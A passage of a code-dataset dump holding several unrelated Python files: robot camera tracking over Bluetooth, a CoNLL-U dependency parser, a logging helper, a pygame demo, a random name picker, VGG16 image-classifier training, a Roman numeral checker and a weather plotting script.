200\nspeedfactor = 0.3\nturnspeedfactor = 0.3\nturntime = 0.01\nbendscalefactor = 2\nrdeadban = 2\ntolerance = 30\n\n#-------------------- Define functions ------------------------------#\ngeom = geometry.geometry(1) # scale factor to convert pixels to mm\n\n#--------------------- Setup Bluetooth --------------------------------#\ndata = [0,0,0,0]\nsendcount = 0\n\n#------------------------------------------------------------------\n# For Linux / Raspberry Pi\n#------------------------------------------------------------------\nbd_addr = '98:D3:51:FD:81:AC' # use: 'hcitool scan' to scan for your T-Bot address\n#bd_addr = '98:D3:51:FD:82:95' # George\n#bd_addr = '98:D3:91:FD:46:C9' # B\n#bd_addr = '98:D3:32:21:3D:77'\nport = 1\nbtcom = tbt.bt_connect(bd_addr,port,'PyBluez') # PyBluez works well for the Raspberry Pi\n#btcom = tbt.bt_connect(bd_addr,port,'Socket')\n\n#----------------------------------------------------------------------#\n# For Windows and Mac\n#----------------------------------------------------------------------#\n#port = 'COM5'\n#port = '/dev/tty.George-DevB'\n#baudrate = 38400\n#bd_addr = 'Empty'\n#btcom = tbt.bt_connect(bd_addr,port,'PySerial',baudrate)\n#---------------------- Setup the Camera ----------------------------#\n\n\n\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_AUTOFOCUS, 0)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, 720)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, 405)\n\n\nsuccess, frame = cap.read()\nif not success:\n print('Check camera connection')\n sys.exit(1)\n\ncap.release()\n\n#----------------- Generate target function -------------------------#\nsuccess, frame = cap.read()\namplitude = 80\nfrequency = 1.5\nphase = 0\nstepsize = 5\nborder = 80 # sets the number of pixels from the edge which wont be occupied by the function.\nbg = frame.shape[0]/2 # this is the background of the sin function\n\n#---------------- Create coordinates for path --------------------#\nxdata = np.arange(border, frame.shape[1]-border, stepsize)\naa = geom.sinfuncM(xdata,border,bg,amplitude,frequency,phase)\n\n#aa = np.loadtxt('pathpoints.dat') # Use Click2Path.py to create an arbitrary path\n#aa = geom.circlefunc([frame.shape[0]/2,frame.shape[1]/2],100,100)\n\n########################################################################\n#----------------------- Start main loop ----------------------------#\n########################################################################\n\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_AUTOFOCUS, 0)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, 720)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, 405)\n#cap.set(0,1280)\n\noldtime = time()\nif __name__ == '__main__':\n \n success, frame = cap.read()\n if not success:\n print('Failed to capture video')\n sys.exit(1)\n\n #####################################################\n #----------------- Track T-Bot -------------------#\n #####################################################\n\n while cap.isOpened():\n success, frame = cap.read()\n if not success:\n break\n\n if ~btcom.connected():\n\n tries = 0\n while btcom.connected() < 1 and tries < 10:\n print('Connecting ...')\n try:\n print('Try '+str(tries+1)+' of 10')\n btcom.connect(0)\n btcom.connect(1)\n tries+=1\n except:\n print('Something went wrong')\n \n if btcom.connected() < 1:\n print('Exiting Program')\n sys.exit()\n else:\n tries = 0\n data = btcom.get_data(data) \n\n blurred = cv2.GaussianBlur(frame, (11, 11), 0)\n hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV) # do this outside function so it is not done twice\n\n try: \n x, y, center, radius, M, cents = geom.tracker(hsv, greenLower, greenUpper)\n\n if radius > 1:\n cv2.circle(frame, (int(x), int(y)), int(radius),(0, 255, 0), 2)\n cv2.circle(frame, center, 2, (0, 255, 0), -1)\n pts.appendleft(center)\n except:\n\n pass\n \n try:\n x2, y2, center2, radius2, M2, cents2 = geom.tracker(hsv, pinkLower, pinkUpper)\n\n if radius2 > 1:\n cv2.circle(frame, (int(x2), int(y2)), int(radius2),(113,212,198), 2)\n cv2.circle(frame, center2, 2, (113,212,198), -1)\n pts2.appendleft(center2)\n \n except:\n \n pass\n\n #------------- Plot trail overlay -------------#\n\n for i in range(1, len(pts)):\n # if either of the tracked points are None, ignore\n if pts[i - 1] is None or pts[i] is None:\n continue\n \n cv2.line(frame, pts[i - 1], pts[i], (0, 255, 0), 1)\n\n for ii in range(1, len(pts2)):\n # if either of the tracked points are None, ignore\n if pts2[ii - 1] is None or pts2[ii] is None:\n continue\n \n cv2.line(frame, pts2[ii - 1], pts2[ii], (113,212,198), 1)\n\n \n cv2.polylines(frame, np.int32([aa]),True,(255,0,109),2)\n cv2.circle(frame, tuple(aa[pathindex,:].astype(int)), 8, (250,150,10), -1)\n\n if laptime < oldlaptime:\n if laptime < 1000:\n textstr = 'Best time is: '+\"{:6.4f}\".format(laptime)\n oldlaptime = laptime\n \n cv2.putText(frame, textstr, org, font,fontScale, color, thickness, cv2.LINE_AA)\n textstr2 = 'Last lap time: '+\"{:6.4f}\".format(laptime)\n cv2.putText(frame, textstr2, (org[0],org[1]+20), font,fontScale, color2, thickness, cv2.LINE_AA)\n\n cv2.imshow('MultiTracker', frame)\n\n\n ###################################################\n #--------------- Control Strategy ---------------#\n ###################################################\n \n if x != [] and x2 !=[]:\n vto = aa[pathindex] # target coordinate\n try:\n vto_next = aa[pathindex+3] # next target coordinate\n except:\n pass\n _distance = geom.distance((x,y),(x2,y2),vto) # distance to target coordinate\n\n if _distance < tolerance:\n pathindex += 1 # if close enough to target coordinate, get next coordinate\n vto = aa[pathindex]\n \n if timeflag == 0:\n starttime = time()\n timeflag = 1\n \n pos_pid.clear() \n angle_pid.clear()\n \n\n if pathindex == len(aa)-1:\n sendcount = btcom.send_data('200200Z',sendcount)\n print('Done, reached end of path...')\n #aa = np.flipud(aa)\n laptime = time()-starttime\n #feedforward += 1\n #print(feedforward)\n pathindex = 0\n timeflag = 0\n\n angle = geom.angle((x,y),(x2,y2),vto)\n #dt = time()-oldtime\n #rotspeed = 200+angle_pid.output(0,-angle,dt)\n rotspeed = 200+angle_pid.output(0,-angle)\n oldtime = time()\n #straightspeedfactor = 1-np.sin(abs(angle))\n straightspeedfactor = 1\n #forwardspeed = 200+straightspeedfactor*(pos_pid.output(0,-_distance,dt)+feedforward)\n forwardspeed = 200+straightspeedfactor*(pos_pid.output(0,-_distance)+feedforward)\n\n\n #------------ build data string ------------#\n\n rotspeed = '%03d' % rotspeed\n \n forwardspeed = '%03d' % forwardspeed\n\n print('forward speed '+forwardspeed+' turn speed '+rotspeed)\n #-------------- Send data ---------------#\n sendstr = str(rotspeed)+str(forwardspeed)+'Z'\n sendcount = btcom.send_data(sendstr,sendcount)\n\n \n\n key = cv2.waitKey(1) & 0xFF\n if key == ord(\"x\"):\n stepsize += 1\n xdata = np.arange(border, frame.shape[1]-border, stepsize)\n aa = geom.sinfuncM(xdata,border,bg,amplitude,frequency,phase)\n\n if key == ord(\"z\"):\n \n if stepsize > 1:\n stepsize -= 1\n xdata = np.arange(border, frame.shape[1]-border, stepsize)\n aa = geom.sinfuncM(xdata,border,bg,amplitude,frequency,phase)\n\n\n if key == ord(\"w\"):\n amplitude += 5\n aa = geom.sinfuncM(xdata,border,bg,amplitude,frequency,phase)\n\n if key == ord(\"s\"):\n amplitude -= 5\n aa = geom.sinfuncM(xdata,border,bg,amplitude,frequency,phase)\n\n if key == ord(\"t\"):\n buttonstring = '200200F' # Auto trim\n sendcount = btcom.send_data(buttonstring,sendcount)\n if key == ord(\"r\"):\n buttonstring = '200200E' # Auto trim\n sendcount = btcom.send_data(buttonstring,sendcount)\n if key == ord(\"y\"):\n buttonstring = '200200T' # Auto trim\n sendcount = btcom.send_data(buttonstring,sendcount)\n \n if key == ord(\"d\"):\n frequency += 0.5\n aa = geom.sinfuncM(xdata,border,bg,amplitude,frequency,phase)\n\n if key == ord(\"a\"):\n frequency -= 0.5\n aa = geom.sinfuncM(xdata,border,bg,amplitude,frequency,phase)\n\n if key == ord(\"g\"):\n speedfactor += 0.01\n print('speedfactor = '+str(speedfactor))\n if key == ord(\"f\"):\n feedforward -= 1\n print('speedfactor = '+str(speedfactor))\n if key == ord(\"g\"):\n feedforward += 1\n print('turnspeedfactor = '+str(turnspeedfactor))\n if key == ord(\"y\"):\n turnspeedfactor -= 0.01\n print('turnspeedfactor = '+str(turnspeedfactor))\n # if the 'q' key is pressed, stop the loop\n if key == ord(\"t\"):\n sendcount = btcom.send_data('200200T',sendcount)\n\n if key == ord(\"q\"):\n\n cap.release()\n sendcount = btcom.send_data('200200Z',sendcount)\n btcom.connect(0)\n break\n if record:\n if tii == 5:\n cv2.imwrite(template % iii, frame)\n iii += 1\n tii = 0\n else:\n tii += 1\n\n\ncv2.destroyAllWindows()\n\n\n\n","sub_path":"Python/Development/T-Bot_Tracking/TBot_HSVTracking.py","file_name":"TBot_HSVTracking.py","file_ext":"py","file_size_in_byte":12788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"79465786","text":"# -*- coding:utf-8 -*-\n'''\nCreated on Feb 18, 2017\n\n@author: burak\n'''\n\nimport re\nimport logging\nimport networkx as nx\n\n\nLOG_LEVEL = logging.INFO\n\nclass CoNLL_UD():\n '''\n CoNLL Universal Dependencies\n '''\n\n def __init__(self, sentence, tag_simplify=1, log_level=LOG_LEVEL):\n '''\n Constructor\n '''\n self.sentence_conllu = sentence\n self.simple = tag_simplify\n\n self._tokenized_sent = []\n self._graph = None\n self._features = []\n self._supertags = []\n self.keys = ['ID', 'FORM', 'LEMMA', 'UPOSTAG', 'XPOSTAG', 'FEATS', 'HEAD', 'DEPREL', 'DEPS', 'MISC']\n \n self.logger = None\n self.init_logging(log_level)\n \n self.to_graph(self.sentence_conllu)\n self.to_features()\n self.to_supertags()\n \n \n @property\n def graph(self):\n return self._graph\n \n @property\n def features(self):\n return self._features\n \n @property\n def supertags(self):\n return self._supertags\n \n @property\n def sentence(self):\n return self._tokenized_sent\n \n @property\n def nodes(self):\n return sorted(self.graph.nodes(), key=lambda n: self.graph.node[n]['POSITION'])\n \n \n def height(self, tree, root):\n if tree.successors(root) != []:\n return max([self.height(tree, r) for r in tree.successors(root)]) + 1\n else:\n return 0\n \n \n def to_attr(self, line):\n '''\n '''\n values = [token.strip() for token in line.strip().split('\\t')]\n assert len(self.keys) == len(values), 'number of fields do not match'\n return {k:v for k,v in zip(self.keys, values)}\n \n \n def clear_tag(self, supertag):\n '''\n remove subcategories from supertags\n (S[dcl]\\\\NP)/(S[b]\\\\NP) -> (S\\\\NP)/(S\\\\NP) -> (S-NP)-(S-NP)\n ((S\\\\NP)\\(S\\\\NP))/N[num] -> ((S\\\\NP)\\\\(S\\\\NP))/N -> ((S-NP)-(S-NP))-N\n \n maybe also remove directions from slashes\n \n self.simple:\n 0: none\n 1: subcategories\n 2: directions\n 3: both subcategories and directions\n '''\n if self.simple % 2 == 1:\n supertag = re.sub('\\[[^\\]]*\\]', '', supertag)\n if self.simple // 2 == 1:\n supertag = re.sub(r'[\\\\/]', '-', supertag)\n return supertag\n \n \n def misc_attr(self, s):\n '''\n example MISC field:\n cat=((S[b]\\\\NP)/PP)/NP|args=2:1,11:3,12:2|preds=8:2,16:2\n {'CAT': '((S\\\\NP)/PP)/NP', # or '((S-NP)-PP)-NP'\n 'PREDS': [('8', '2'), ('16', '2')], \n 'ARGS': [('2', '1'), ('11', '3'), ('12', '2')]}\n \n consider misc data in the treebank\n consider misc data without =\n arabic\n consider multiple =\n catalan\n MWE=Embassaments=_Transvasaments\n '''\n d = {}\n self.logger.debug(s)\n if s != '_':\n #tmp = {k:v for t in s.split('|') for k,v in [t.split('=')]}\n misc = s.split('|')\n for tmp in misc:\n if 'cat=' in tmp:\n # d['CAT'] = tmp['cat']\n _, v = tmp.split('=')\n d['CAT'] = self.clear_tag(v)\n elif 'preds=' in tmp:\n _, v = tmp.split('=')\n d['PREDS'] = [(i,p) for t in v.split(',') for i,p in [t.split(':')]]\n elif 'args=' in tmp:\n _, v = tmp.split('=')\n d['ARGS'] = [(i,p) for t in v.split(',') for i,p in [t.split(':')]]\n elif '=' in tmp:\n kv = tmp.split('=')\n k, v = kv[0], '='.join(kv[1:])\n d[k] = v\n else:\n d['OTHER'] = tmp\n self.logger.debug(str(d))\n return d\n\n \n def to_graph(self, sentence):\n '''\n \n '''\n\n words = []\n comments = ''\n i = 0\n for line in sentence:\n # only before the sentence_conllu \n if line.strip()[0] == '#':\n comments += line\n # words, also adds empty nodes and multiword tokens\n else:\n w = self.to_attr(line)\n if '-' not in w['ID']:\n i += 1\n w['POSITION'] = i\n words.append(w)\n \n if words == []:\n self.logger.error('empty sentence_conllu')\n return\n \n # build graph if there are words \n graph = nx.MultiDiGraph(COMMENTS=comments, GROUPS=[], NUM_TOKENS=len(words)) \n \n # add nodes while checking multi-word tokens\n m_ids = []\n m_form = ''\n for w in words:\n if '-' in w['ID']:\n start, end = [int(i) for i in w['ID'].split('-')]\n m_ids = range(start, end+1)\n m_form = w['FORM']\n graph.graph['GROUPS'].append((str(start), str(end), m_form))\n self.logger.debug('multi ' + w['ID'] +' '+ str(start) +' '+ str(end) +' '+ m_form)\n else:\n self._tokenized_sent.append(w['FORM'])\n w2 = w\n w2.update(self.misc_attr(w['MISC']))\n if int(w['ID'].split('.')[0]) in m_ids:\n w2['MULTI-FORM'] = m_form\n w2['MULTI-IDS'] = '-'.join([str(m_ids[0]), str(m_ids[-1])])\n graph.add_node(w['ID'], attr_dict=w2)\n self.logger.debug('added ' + w2['ID'])\n self.logger.debug('node data: ' + str(w2))\n \n # add edges\n # multiple instances of ROOT in a single sentence_conllu is possible\n root_candidates=set([])\n for w in words:\n if w['HEAD'] == '_':\n continue\n if '-' not in w['ID']:\n if w['DEPREL'].lower() != 'root' :\n graph.add_edge(w['HEAD'], w['ID'], key='ud', attr_dict={'REL':w['DEPREL'], 'TYPE':'primary'})\n if 'DEPENDENTS' not in graph.node[w['HEAD']]:\n graph.node[w['HEAD']]['DEPENDENTS'] = []\n graph.node[w['HEAD']]['DEPENDENTS'].append(w['ID'])\n self.logger.debug('edge ' + w['HEAD'] +' '+ w['ID'] +' '+ w['DEPREL'])\n else:\n root_candidates.add(w['ID'])\n self.logger.debug('root ' + w['HEAD'] +' '+ w['ID'] +' '+ w['DEPREL'])\n \n # check for cycles, should be acyclic a this point\n if len(list(nx.simple_cycles(graph))) > 0:\n self.logger.error('cycle detected in sent')\n self.logger.error(list(nx.simple_cycles(graph)))\n return\n \n # choose a root based on height (only ud edges) \n root = max(root_candidates, key=lambda r:self.height(graph, r))\n \n # add other dependencies DEPS, PHEAD, PDEPREL\n for w in words:\n # ex: 2:nsubj|4:nsubj\n # multiple :\n # ex2: 8.1:nsubj:pass\n # 0 root may not be the primary\n # ex: 2.1 _ _ _ _ _ _ _ 0:exroot _\n if w['DEPS'] != '_':\n for d in w['DEPS'].split('|'):\n hr = d.split(':')\n h, r = hr[0], ':'.join(hr[1:])\n if h == '_':\n continue\n # root may not be the primary relation \n # in this case it won't be at the top of the tree\n # exroot -> dont care\n if r.lower() == 'root' :\n root_candidates.add(w['ID'])\n self.logger.debug('root2 ' + w['HEAD'] +' '+ w['ID'] +' '+ w['DEPREL'])\n # DEPREL has a duplicate here\n elif h != w['HEAD'] and h!= '0':\n graph.add_edge(h, w['ID'], key='ud', attr_dict={'REL':r, 'TYPE':'secondary'})\n if 'DEPENDENTS' not in graph.node[h]:\n graph.node[h]['DEPENDENTS'] = []\n graph.node[h]['DEPENDENTS'].append(w['ID'])\n self.logger.debug('edge2 ' + w['HEAD'] +' '+ w['ID'] +' '+ w['DEPREL'])\n \n # add ccg edges\n for w in words:\n if 'ARGS' in w:\n for idx, slot in w['ARGS']:\n graph.add_edge(w['ID'], idx, key='ccg', attr_dict={'ARG-NO':slot})\n self.logger.debug('edge ccg ' + w['ID'] +' '+ idx +' '+ slot)\n \n graph.graph['ROOT'] = root\n graph.graph['ROOTS'] = root_candidates\n self._graph = graph\n \n self.logger.debug('GRAPH:' + str(graph.graph))\n self.logger.debug('NODES:' + str(graph.nodes()))\n self.logger.debug('EDGES:' + str(graph.edges()))\n\n\n def to_features(self):\n '''\n skip multiword tokens\n '''\n for w in self.nodes:\n if '-' in w:\n continue\n feats = {}\n # node dict\n d = self.graph.node[w]\n feats['idx'] = w\n feats['pos'] = d['UPOSTAG']\n feats['pos_x'] = d['XPOSTAG']\n # head dict, only consider the given head, not secondary edges\n h = d['HEAD']\n feats['head'] = h\n if h == '_':\n feats['head_pos'] = '_'\n feats['head_pos_x'] = '_'\n feats['head_position'] = None # False\n feats['head_rel'] = '_'\n elif h != '0':\n dh = self.graph.node[h]\n feats['head_pos'] = dh['UPOSTAG']\n feats['head_pos_x'] = dh['XPOSTAG']\n feats['head_position'] = '<' if dh['POSITION'] < d['POSITION'] else '>'\n feats['head_rel'] = self.graph.edge[h][w]['ud']['REL']\n else:\n feats['head_pos'] = 'ROOT'\n feats['head_pos_x'] = 'ROOT'\n feats['head_position'] = None # False\n feats['head_rel'] = 'ROOT'\n feats['dep_count'] = 0\n # dependents, optional, multiple\n if 'DEPENDENTS' in d:\n feats['dep_count'] = len(d['DEPENDENTS'])\n if feats['dep_count']>10:\n self.logger.debug('pruning dependents from ' + self.graph.graph['COMMENTS'] +' word_id = '+ w)\n self.logger.debug('used first 10 of ' + str(feats['dep_count']) + ' dependencies')\n for i,dep in enumerate(d['DEPENDENTS']):\n if i>9:\n break\n dd = self.graph.node[dep]\n feats['dep_'+str(i+1)] = dep\n feats['dep_'+str(i+1)+'_pos'] = dd['UPOSTAG']\n feats['dep_'+str(i+1)+'_pos_x'] = dd['XPOSTAG']\n feats['dep_'+str(i+1)+'_position'] = '<' if dd['POSITION'] < d['POSITION'] else '>'\n feats['dep_'+str(i+1)+'_rel'] = self.graph.edge[w][dep]['ud']['REL']\n \n self._features.append(feats)\n \n \n def print_feat_dict(self, d):\n print('word'.ljust(15) +'\\t'+ self.graph.node[d['idx']]['FORM'])\n keys = ['idx', 'pos', 'pos_x', 'head', 'head_pos', 'head_pos_x', 'head_position', 'head_rel', 'dep_count']\n for k in keys + sorted([k for k in d if k not in keys], key=lambda x: (int(x.split('_')[1]), x)):\n print(k.ljust(12) +'\\t'+ str(d[k]))\n \n def print_feats(self):\n for feat in self.features:\n print()\n self.print_feat_dict(feat)\n \n def to_supertags(self):\n '''\n skip multiword tokens\n '''\n for w in self.nodes:\n if '-' in w:\n continue\n self._supertags.append(self.graph.node[w].get('CAT', '_'))\n\n \n def update_supertags(self, pred):\n for i,w in enumerate(self.nodes):\n if self.graph.node[w]['MISC'] == '_':\n self.graph.node[w]['MISC'] = 'cat='+pred[i]\n else:\n self.graph.node[w]['MISC'] += '|cat='+pred[i]\n \n\n def __repr__(self):\n s = ''\n if self.graph.graph['COMMENTS']:\n s += self.graph.graph['COMMENTS'] + '\\n'\n for n in self.nodes:\n if 'MULTI-FORM' in self.graph.node[n]:\n m_start = self.graph.node[n]['MULTI-IDS'].split('-')[0]\n if m_start == n:\n s += self.graph.node[n]['MULTI-IDS'] +'\\t'+ self.graph.node[n]['MULTI-FORM'] + 8*'\\t_' + '\\n'\n self.logger.debug(n +' : '+ self.graph.node[n]['MULTI-IDS'] +' '+ self.graph.node[n]['MULTI-FORM'])\n s += '\\t'.join(self.graph.node[n][k] for k in self.keys) + '\\n'\n s += '\\n'\n return s\n \n \n def init_logging(self, log_level):\n '''\n logging config and init\n '''\n if not self.logger:\n formatter = logging.Formatter('%(asctime)s-|%(name)s:%(funcName)12s|-%(levelname)s-> %(message)s')\n self.handler = logging.StreamHandler()\n self.handler.setLevel(log_level)\n self.handler.setFormatter(formatter)\n self.logger = logging.getLogger(self.__class__.__name__)\n self.logger.addHandler(self.handler)\n self.logger.setLevel(log_level)\n \n \n def __del__(self):\n # remove handler or else duplicate logs\n self.logger.removeHandler(self.handler)\n # ? \n del self.logger \n\n\nif __name__ == '__main__':\n \n with open('ud-treebanks-conll2017/UD_English/en-ud-train.conllu', 'r', encoding='utf-8') as sample:\n sents = sample.read().strip().split('\\n\\n')\n\n for sent in sents:\n #deps = CoNLL_UD(sent.strip().split('\\n'), log_level=logging.DEBUG)\n deps = CoNLL_UD(sent.strip().split('\\n'))\n print(deps)\n #deps.print_feats()\n print(deps.supertags)\n del deps\n #for i in ['3', '8', '9', '10']:\n # print(deps.graph.node[i])\n #print()\n #for f in deps.features:\n # print(f)\n\n #deps.print_feats()\n\n","sub_path":"SupertaggerUD/conllu.py","file_name":"conllu.py","file_ext":"py","file_size_in_byte":14186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"270848330","text":"import logging\r\nfrom common import config\r\n\r\n\r\ndef setup_logging(log, conf):\r\n log.setLevel(conf.log_level)\r\n fh = logging.FileHandler(conf.log_file, mode='w')\r\n fh.setLevel(conf.log_level)\r\n fh.setFormatter(logging.Formatter(conf.log_format))\r\n log.addHandler(fh)\r\n\r\n\r\nglobal LOG\r\nLOG = logging.getLogger('openstack-tool')\r\nsetup_logging(LOG, config.CONF.log)\r\n","sub_path":"common/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"85914650","text":"import pygame as p\r\n\r\np.init() #초기화\r\nsize = (400,400)\r\nb = (0,0,0) #(R,G,B)\r\nw = (255,255,255)\r\nsc = p.display.set_mode(size)\r\np.display.set_mode(size) #해상도설정0\r\np.display.set_caption('image') #창이름\r\nx= p.image.load('1.png')\r\ny= p.image.load('2.png')\r\nz= p.image.load('3.png')\r\np.mixer.music.load('1.mp3')\r\np.mixer.music.load('2.mp3')\r\np.mixer.music.play()\r\ndone = False\r\n\r\nwhile not done:\r\n print('반복중')\r\n for event in p.event.get(): #사용자가 뭘 눌렀는지 감지 \r\n if event.type == p.QUIT: # 게임창 x 버튼을 눌렀다면\r\n done = True #계속 반복을 종료\r\n p.mixer.music.stop\r\n print('반복 끝남')\r\n\r\n sc.fill(w) #배경화면 색깔 설정\r\n sc.blit(x,(200,100))\r\n sc.blit(y,(100,100))\r\n sc.blit(z,(0,100))\r\n p.display.flip()\r\n \r\n\r\n\r\n","sub_path":"20-05-13 이미지 삽입2.py","file_name":"20-05-13 이미지 삽입2.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"435864669","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# 创建一个字典student,key是学号,value是姓名\n# 学生信息在student.csv文件里,从文件中读取并保存到字典\n# 打开student.csv文件\n\nfile = open(r'E:\\学习文件夹\\人工班名单csv.csv','r')\n\n\n# In[2]:\n\n\n# 读取文件内容\nlines = file.readlines()\n\n\n# In[3]:\n\n\n# 抽取每行的学号和姓名,保存到字典\nstudents = {}\nfor line in lines:\n tmp_list = line.split(',')\n xuehao = tmp_list[0]\n xingming = tmp_list[2]\n students[xuehao] = xingming\nprint(students)\n\n\n# In[4]:\n\n\n# 从学号中随机抽取N个学号\nimport random\nnum = int(input(\"请输入你要抽取的人数:\"))\n# 如何把字典中的key(学号)抽取成列表\nxuehao_list = random.sample(students.keys(),num)\nxuehao_list\n\n\n# In[5]:\n\n\n# 根据随机的学号,打印输出对应的姓名\nfor xuehao in xuehao_list:\n print(students[xuehao])\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"git代码库/随机点名.py","file_name":"随机点名.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"251922671","text":"import cv2 \nimport os \nimport numpy as np \nfrom random import shuffle \nfrom tqdm import tqdm \nimport tensorflow as tf\nfrom tensorflow.keras import layers,Sequential,optimizers,applications, Model, applications \nfrom tensorflow.keras.preprocessing import image\n\nnum_classes=12\nbatch_size = 8 #more means better faster convergence but takes more resources\ntrain_data_num = 14000 #change it accordingly\n\n\ndata= np.load('augmented_data_mini_letter.npy', allow_pickle=True)\n\nprint(np.shape(data))\n'''Running the training and the testing in the dataset for our model'''\n\nimg_data = np.array([i[0] for i in data]).reshape(-1,224,224,3)\nlbl_data = np.array([i[1] for i in data]).reshape(-1,num_classes)\n\ntr_img_data = img_data[:train_data_num,:,:,:]\ntr_lbl_data = lbl_data[:train_data_num,:]\n\ntst_img_data = img_data[train_data_num:,:,:,:]\ntst_lbl_data = lbl_data[train_data_num:,:]\n\n\n#Code taken from: https://github.com/keras-team/keras/issues/9214\nbase_model = applications.VGG16(weights='imagenet', include_top=False)\nx = base_model.output\nx = layers.GlobalMaxPooling2D()(x)\nx = layers.Dense(512, activation='relu')(x)\npredictions = layers.Dense(num_classes, activation='softmax')(x)\nmodel = Model(inputs=base_model.input, outputs=predictions)\n#model.summary()\n \n\n \nx_train = applications.vgg16.preprocess_input(tr_img_data)\ny_train = tr_lbl_data\n\n\n\n \n#unfreezing all layers and retraining with low learning rate\nfor layer in model.layers:\n layer.trainable = True\n\n\n\noptimizer=optimizers.Adam(lr=5e-5)\nmodel.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy'])\nmodel.fit(x_train, y_train, epochs=5 , batch_size=batch_size, shuffle=False, \n validation_split=0.1) #will try with 5 epochs later\n\n \n\nprint('Testing on unseen data:')\nx_test = applications.vgg16.preprocess_input(tst_img_data)\ny_test = tst_lbl_data\ntest_loss, test_acc = model.evaluate(x_test, y_test, verbose=1)\n#model.summary()\n\n\nmodel.save('vgg16_model_letter.h5')\n\nprint(\"Saved model to disk\")\n","sub_path":"Approach 2 - Letter 11 classes and Quality 4 classes/vgg16-train-letter.py","file_name":"vgg16-train-letter.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"338441663","text":"# Calculates value of roman numerals and throws errors if invalid\n\nvalue = {\n 'I': 1,\n 'V': 5,\n 'X': 10,\n 'L': 50,\n 'C': 100,\n 'D': 500,\n 'M': 1000\n}\n\ndef isSubtractive(c):\n return c == 'C' or c == 'X' or c == 'I'\n\ndef romanToNum(roman):\n prevVal = 1234567890\n total = 0\n i = 0\n valid = True\n while i < len(roman):\n if roman[i] not in value.keys():\n print(\"Bad1 \" + roman)\n valid = False\n break\n # Check if this could be a compound term\n if isSubtractive(roman[i]) and i+1 < len(roman):\n # Could be compound\n if roman[i+1] not in value.keys():\n print(\"Bad1 \" + roman)\n valid = False\n break\n if value[roman[i+1]] > value[roman[i]]:\n # Yes, this is a compound term\n if i+2 < len(roman):\n # Check that the next is valid\n if roman[i+2] not in value.keys():\n print(\"Bad1 \" + roman)\n valid = False\n break\n if value[roman[i+2]] >= value[roman[i]]:\n print(\"Bad3 \" + roman)\n valid = False\n break\n # Haven't broken, so we can go ahead\n val = value[roman[i+1]] - value[roman[i]]\n if val > prevVal:\n print(\"Bad2 \" + roman)\n valid = False\n break\n else:\n total += val\n prevVal = val\n i += 2\n continue\n # Everything that gets here is not a compound\n if i+1 < len(roman):\n if roman[i+1] not in value.keys():\n print(\"Bad1 \" + roman)\n valid = False\n break\n if value[roman[i+1]] > value[roman[i]]:\n # Not a compound term but the next value is larger\n print(\"Bad2 \" + roman)\n valid = False\n break\n val = value[roman[i]]\n if val > prevVal:\n print(\"Bad2 \" + roman)\n valid = False\n break\n else:\n total += val\n prevVal = val\n i += 1\n continue\n\n if valid:\n print(str(total) + \" \" + roman)\n\n# Read input here\nwith open(\"romannum.in\") as f:\n n = f.readline()\n romanNums = f.readlines()\n\nfor roman in romanNums:\n roman = roman.strip()\n if len(roman) < 1:\n print(\"Bad1\")\n else:\n romanToNum(roman)\n","sub_path":"ProgComp/romannum.py","file_name":"romannum.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"64490786","text":"import csv\nfrom datetime import datetime\nfrom matplotlib import pyplot as plt\n\nfile_name = 'c:/Users/Val/Desktop/Py/Project_2/16Loading data/CSV_file/sitka_weather_2018_simple.csv'\nwith open(file_name) as f:\n\treader = csv.reader(f) #csv.reader() метод принимет объект файла в аргументе, чтобы создать объект чтения данных для этого файла\n\theader_row = next(reader)\n\n\tfor index, column_header in enumerate(header_row): #enumerate() возвращает индекс каждого элемента и его значение при переборе списка\n\t\tprint(index, column_header)\n\t\n\t#Чтение дат и максимальных и минимальных температур из файла\n\tdates, highs, lows = [], [], []\n\t\n\tfor row in reader:\n\t\tcurrent_date = datetime.strptime(row[2], \"%Y-%m-%d\")\n\t\thigh = int(row[5])\n\t\tlow = int(row[6])\n\t\tdates.append(current_date)\n\t\thighs.append(high)\n\t\tlows.append(low)\n\n\t#Нанесение данных на диаграмму\n\tplt.style.use('seaborn')\n\tfig, ax = plt.subplots()\n\tax.plot(dates, highs, c='red', alpha=0.5)\n\tax.plot(dates, lows, c='blue', alpha=0.5)\n\tplt.fill_between(dates, highs, lows, facecolor = 'orange', alpha=0.5)\n\n\t#форматирование диаграммы\n\tplt.title(\"Daily high and low temperatures - 2018\", fontsize = 24)\n\tplt.xlabel('', fontsize = 16)\n\tfig.autofmt_xdate()\n\tplt.ylabel(\"Temperature (F)\", fontsize = 16)\n\tplt.tick_params(axis = 'both', which = 'major', labelsize = 16)\n\n\tplt.show()\n","sub_path":"Loading data/CSV_file/sitka_highs_lows.py","file_name":"sitka_highs_lows.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} 